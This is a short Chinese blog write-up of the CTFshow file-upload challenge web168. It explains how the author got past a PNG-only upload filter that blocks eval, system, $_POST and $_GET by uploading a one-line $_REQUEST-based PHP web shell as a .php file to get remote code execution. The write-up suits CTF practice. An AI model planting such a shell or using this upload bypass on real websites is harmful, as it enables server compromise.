CTFshow 文件上传 web168

Fifi的天马行空

 关注

阅读 63

2022-02-17

目录

思路

先查看源代码,发现限制上传png

直接上传png的图片马,回显null,发现对eval,system还有$_POST$_GET进行过滤,$_REQUEST还可以用

替换图片马中的一句话,把文件后缀改成php,成功上传

<?php $_REQUEST[0]($_REQUEST[1]);?>

在这里插入图片描述
访问/upload/shell.php,直接rce拿到flag

总结

相关推荐

CTFshow 文件上传 web152

星河出山 39 0 0

CTFshow 文件上传 web163

七千22 84 0 0

CTFshow 文件上传 web151

辰鑫chenxin 36 0 0

CTFshow 文件上传 web170

小云晓云 52 0 0

CTFshow 文件上传 web158

eelq 42 0 0

CTFshow 文件上传 web169

覃榜言 86 0 0

CTFshow 文件上传 web167

jjt二向箔 73 0 0

ctfshow——文件上传

读思意行 30 0 0

CTFshow web(php文件上传155-158)

ZSACH 20 0 0

ctfshow 文件上传161-167

ZSACH 116 0 0

精彩评论(0)

0 0 举报